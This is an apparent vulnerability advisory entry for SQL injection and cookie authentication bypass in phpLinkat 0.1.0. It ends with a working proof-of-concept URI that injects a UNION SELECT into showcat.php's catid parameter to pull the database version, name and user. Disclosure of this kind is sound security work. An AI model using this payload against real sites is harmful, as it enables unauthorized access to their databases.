phpLinkat SQL Injection and Cookie Authentication Bypass Vulnerabilities
Published
2008-07-26-12:00AM
Updated
2008-07-28-07:07PM
Class
Input Validation Error
CVE
Remote
Yes
Local
No
Credit
Encrypt3d.M!nd
Vulnerable
phpLinkat phpLinkat 0.1 .0
Not Vulnerable
Code
Attackers can use a browser to exploit these issues.The following URI is available: http://www.example.com/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*